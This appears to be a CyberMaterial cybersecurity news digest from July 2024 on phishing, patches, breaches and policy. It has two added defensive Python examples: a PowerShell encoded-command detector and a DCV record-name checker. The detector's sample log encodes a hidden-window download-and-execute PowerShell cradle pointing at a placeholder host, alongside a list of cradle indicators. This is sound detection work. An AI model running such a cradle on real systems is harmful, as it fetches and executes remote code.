What’s the latest in the cyber world today?
OneDrive, PowerShell Script, Security Updates, iOS, macOS, tvOS, visionOS, VMware, ESXi Hypervisor, Admin Privileges, Proofpoint, Email Routing, Phishing, DigiCert, SSL/TLS Certificates, Domain Verification, Zeus Group, Israeli Athletes, Paris Olympics, Northeast Rehabilitation Hospital Network, Patient Data, Russia, Avanpost, Pro-Ukrainian Hackers, RA World, Melchers, UAB Nursing School, Recruitment Postcard, European Central Bank, Stress Test, US, TikTok Ban, National Security, UK, Information Commissioner’s Office, Electoral Commission, Security Issue, Reserve Bank of India, Local Data Breach, ZeroTier, Series A, Funding, Virtual Networking
Cyber Alerts
A sophisticated phishing campaign targeting Microsoft OneDrive users has been discovered, leveraging social engineering to execute a malicious PowerShell script. Dubbed “OneDrive Pastejacking,” the attack involves sending an email with an HTML file that simulates a OneDrive error page. Users are deceived into opening a PowerShell terminal and running a Base64-encoded command, leading to the download and execution of a malicious script.
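The lure above ends with the victim pasting a Base64-encoded command into a PowerShell console. From the defender's side, the useful signal is a PowerShell process launched with an encoded command that decodes to a download-and-execute cradle. The following is an added example, not CyberMaterial's code: it decodes the `-EncodedCommand` payload (base64 over UTF-16LE), checks the decoded text against a hypothetical indicator list, and runs over a few constructed process-creation records. The record format, indicator list and stealth-flag list are assumptions for this example.

```python
"""Flag PowerShell encoded-command launches that decode to a download cradle.
Added example for illustration; not CyberMaterial's or Microsoft's code."""
import base64
import re
from typing import Optional

# PowerShell accepts abbreviated forms of -EncodedCommand; these are the common ones.
ENCODED_FLAG = re.compile(
    r"(?:^|\s)[-/](?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})",
    re.IGNORECASE,
)

# Hypothetical indicator list: substrings in the decoded script that point at
# fetching and running remote content. Tune for your environment.
CRADLE_INDICATORS = (
    "downloadstring", "downloadfile", "invoke-webrequest", "iwr ",
    "invoke-expression", "iex", "frombase64string", "start-bitstransfer",
)
# Outer command-line flags that hide the console from the person who pasted it.
STEALTH_FLAGS = ("-windowstyle hidden", "-w hidden", "-noprofile", "-nop ")


def decode_encoded_command(b64: str) -> Optional[str]:
    """-EncodedCommand payloads are base64 over UTF-16LE text."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_command_line(cmdline: str) -> dict:
    """Decode first, then match: encoded commands are also used legitimately."""
    result = {"encoded": False, "decoded": None, "indicators": [], "suspicious": False}
    lowered = cmdline.lower()
    result["indicators"] += [f for f in STEALTH_FLAGS if f in lowered]
    m = ENCODED_FLAG.search(cmdline)
    if m:
        result["encoded"] = True
        decoded = decode_encoded_command(m.group(1))
        result["decoded"] = decoded
        if decoded:
            dl = decoded.lower()
            result["indicators"] += [i for i in CRADLE_INDICATORS if i in dl]
    cradle_hit = any(i in CRADLE_INDICATORS for i in result["indicators"])
    result["suspicious"] = result["encoded"] and cradle_hit
    return result


def encode_for_powershell(text: str) -> str:
    """Used only to build the constructed sample records below."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


# Constructed sample process-creation records ("parent -> command line"), not real telemetry.
SAMPLE_LOG = [
    "explorer.exe -> powershell.exe -NoProfile -WindowStyle Hidden -enc "
    + encode_for_powershell("iex (New-Object Net.WebClient).DownloadString('http://example.invalid/payload')"),
    "explorer.exe -> powershell.exe -enc " + encode_for_powershell("Get-Date"),
    "services.exe -> powershell.exe -NoProfile -File C:\\scripts\\backup.ps1",
]


def scan_log(lines):
    """Return the records whose decoded command looks like a download cradle."""
    findings = []
    for line in lines:
        _, _, cmdline = line.partition(" -> ")
        verdict = analyze_command_line(cmdline)
        if verdict["suspicious"]:
            findings.append({"line": line, **verdict})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print("SUSPICIOUS:", f["decoded"], f["indicators"])
```

Only the first record is reported: the second is an encoded but harmless `Get-Date`, and the third is an unencoded scheduled script. Decoding before matching is what keeps the rule from firing on every legitimate encoded command, and the parent process (here `explorer.exe`, which is what a console opened by the user would show) is worth adding as a second condition in a production rule.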
Apple has issued critical security updates for a range of its operating systems, including iOS, macOS, tvOS, visionOS, watchOS, and Safari, addressing numerous vulnerabilities. The updates, released on July 30, 2024, include iOS 17.6 and iPadOS 17.6, which patch 35 security flaws that could lead to authentication bypasses, unexpected application terminations, system shutdowns, information disclosure, denial-of-service attacks, and memory leaks.
Microsoft researchers have uncovered a severe vulnerability in VMware ESXi hypervisors which grants full administrative access to unauthorized users. This flaw allows members of a specially named domain group, “ESX Admins,” to gain unrestricted admin privileges on ESXi hypervisors without proper validation. Exploited by ransomware groups such as Storm-0506 and Octo Tempest, the vulnerability enables attackers to encrypt the hypervisor’s file system, disrupting all hosted virtual machines and potentially leading to data exfiltration and lateral network movement.
An extensive phishing campaign has exploited a significant email routing flaw in Proofpoint’s security infrastructure, affecting millions of users. The campaign, dubbed “EchoSpoofing” by Guardio Labs, involved threat actors sending spoofed emails from well-known companies such as Best Buy, IBM, Nike, and Walt Disney. The flaw in Proofpoint’s servers allowed these emails to bypass traditional security measures, including SPF and DKIM authentication, making them appear legitimate.
DigiCert, a prominent certificate authority, has announced the revocation of thousands of SSL/TLS certificates due to a critical Domain Control Verification error. The issue, stemming from a failure to include an underscore prefix in DNS-based CNAME records, affects approximately 0.4% of domain validations. This oversight violates the CA/Browser Forum’s strict verification rules, necessitating the immediate revocation of non-compliant certificates.
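The underscore rule above exists because a label that begins with an underscore can never be a real hostname, so the random-value record cannot collide with an existing host. The check below is an added example, not DigiCert's or CyberMaterial's code: given the record name a CA asks an applicant to create and the domain being validated, it accepts the record either directly at the validated domain or at a single underscore-prefixed label and rejects the missing-underscore form. The hostnames are constructed, and restricting the prefix to a single label is an assumption of this example rather than a full reading of the Baseline Requirements.

```python
"""Check DNS-based domain-control-validation (DCV) record names for the
required underscore prefix. Added example; not DigiCert's code."""
import re
from typing import List, Tuple

# Underscore-prefixed DNS label, 2-63 characters. The underscore makes it a
# non-hostname label, which is what prevents collision with a real host.
DCV_LABEL = re.compile(r"^_[A-Za-z0-9-]{1,62}$")


def check_dcv_record_name(record_name: str, validated_domain: str) -> Tuple[bool, str]:
    """Return (compliant, reason) for a CNAME/TXT record name used for DCV."""
    record_name = record_name.rstrip(".").lower()
    validated_domain = validated_domain.rstrip(".").lower()
    if record_name == validated_domain:
        return True, "record placed directly at the validated domain"
    if not record_name.endswith("." + validated_domain):
        return False, "record name is not under the validated domain"
    prefix = record_name[: -(len(validated_domain) + 1)]
    if "." in prefix:
        return False, "more than one label prefixed (this example allows one)"
    if not prefix.startswith("_"):
        return False, "prefix label lacks the required leading underscore"
    if not DCV_LABEL.match(prefix):
        return False, "prefix label is not a valid DNS label"
    return True, "underscore-prefixed label"


def suggested_record_name(record_name: str, validated_domain: str) -> str:
    """For the missing-underscore defect, return the corrected record name."""
    ok, reason = check_dcv_record_name(record_name, validated_domain)
    if not ok and "underscore" in reason:
        return "_" + record_name.rstrip(".")
    return record_name


def audit(pairs: List[Tuple[str, str]]) -> List[Tuple[str, str]]:
    """Return (record_name, reason) for every non-compliant pair."""
    failures = []
    for record_name, domain in pairs:
        ok, reason = check_dcv_record_name(record_name, domain)
        if not ok:
            failures.append((record_name, reason))
    return failures


# Constructed sample validations (not real DigiCert data).
SAMPLE_DCV = [
    ("_ab12cd34.example.com", "example.com"),   # compliant
    ("ab12cd34.example.com", "example.com"),    # underscore omitted: the defect described above
    ("example.com", "example.com"),             # record at the domain itself
    ("_ab12cd34.example.net", "example.com"),   # wrong zone
    ("_.example.com", "example.com"),           # underscore alone is not a usable label
]

if __name__ == "__main__":
    for name, reason in audit(SAMPLE_DCV):
        print(f"NON-COMPLIANT {name}: {reason}")
```

Run against the constructed list, three of the five names fail; the second one is the pattern the revocation was about, and `suggested_record_name` turns it into `_ab12cd34.example.com`. Certificate consumers cannot fix a CA's validation logic, but an operator who automates DCV can run this kind of check on the record names their tooling publishes.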
Cyber Incidents
On July 29, 2024, the hacker group known as “Zeus” leaked sensitive data of Israeli athletes participating in the Paris Olympics, including blood test results and login credentials. The breach, revealed on Telegram, led France’s Anti-Cybercrime Office (OFAC) to urgently seek the removal of the compromised information. Zeus, also reported to have disclosed the military status of Israeli athletes, has heightened security concerns amid the ongoing Gaza conflict.
Northeast Rehabilitation Hospital Network (NRHN) has reported a data privacy incident affecting certain current or former patients. Unauthorized access to NRHN’s network occurred between May 13 and May 22, 2024, potentially compromising files containing personal and medical information. While there is no evidence of identity theft or fraud, NRHN is actively investigating and has informed federal law enforcement. The network is enhancing its security measures and reviewing policies to prevent future incidents.
A pro-Ukrainian hacker group known as Cyber Anarchy Squad has claimed responsibility for a significant cyberattack on Russian information security firm Avanpost. The group reported encrypting over 400 virtual machines and physical workstations, destroying more than 60 terabytes of data, and leaking 390 gigabytes of sensitive information. Avanpost, which has been operating for 15 years and provides security systems for various Russian enterprises, confirmed the breach, describing it as a serious cyberattack.
The Bremen-based retail group Melchers has fallen victim to a ransomware attack carried out by the group RA World. The cybercriminals have claimed to have stolen 15 gigabytes of sensitive data, including financial records and business documents, from Melchers’ Singapore branch. While RA World has boasted about the breach on the darknet, Melchers has denied any data leakage. The company has confirmed the attack and is currently working with external experts to restore its systems using backups and investigate the incident further.
The University of Alabama at Birmingham (UAB) School of Nursing has notified 1,655 patients in Birmingham, Alabama, of a privacy breach involving a study recruitment postcard. The postcard, intended for a breast cancer diagnosis survey, inadvertently displayed patients’ names, addresses, and inferred diagnoses. UAB acknowledged the error and has apologized, detailing steps taken to prevent future incidents.
Cyber News
The European Central Bank (ECB) has concluded its inaugural cyber stress test for the European banking sector, revealing that while banks have robust response and recovery frameworks, there is notable room for improvement. The test, conducted in January and involving 109 banks, assessed the sector’s resilience against cyber disruptions. Although banks demonstrated high-level preparedness, weaknesses in recovery capabilities, particularly in worst-case scenarios, were identified.
The U.S. Justice Department is vigorously defending the constitutionality of a new law that could either force TikTok to divest its U.S. assets or result in a ban on the app starting January 2025. In response to TikTok’s lawsuit challenging the law, which TikTok argues infringes on free speech, the Justice Department asserts that the legislation is necessary to address national security concerns. The department contends that TikTok’s ownership by Chinese company ByteDance poses risks of sensitive data exposure and potential manipulation of information consumed by American users.
The Information Commissioner’s Office (ICO) has sharply criticized the UK Electoral Commission for significant security shortcomings that allowed hackers to access personal details of 40 million British voters. The ICO’s investigation into the August 2021 data breach revealed that the Commission failed to implement essential security measures, such as updating its Microsoft Exchange Server and enforcing robust password management policies. The breach, which went undetected until October 2022, was attributed to exploitation of known vulnerabilities and poor security practices.
According to the Reserve Bank of India’s 2024 cybersecurity report, the average cost of a data breach in India surged to $2.18 million in 2023, marking a 28% increase since 2020. The report highlights that phishing and stolen credentials are now the leading attack vectors, with phishing accounting for 22% of incidents. The number of security incidents in India skyrocketed from 53,117 in 2017 to 1.32 million in 2023. The automotive sector emerged as the most vulnerable industry, while the BFSI sector, due to stringent regulations, reported comparatively better protection.
ZeroTier, a leading provider of virtual networking solutions, has raised $13.5 million in Series A funding led by Battery Ventures, with participation from several other investors including 7percent Ventures and Airbridge Equity Partners. Founded in 2011 and based in Irvine, CA, ZeroTier offers a secure and scalable network solution optimized for IoT deployments, connecting over three million devices across 230 countries. The company plans to use the new funds to drive innovation, enhance product development, and expand its market presence.
Copyright © 2024 CyberMaterial. All Rights Reserved.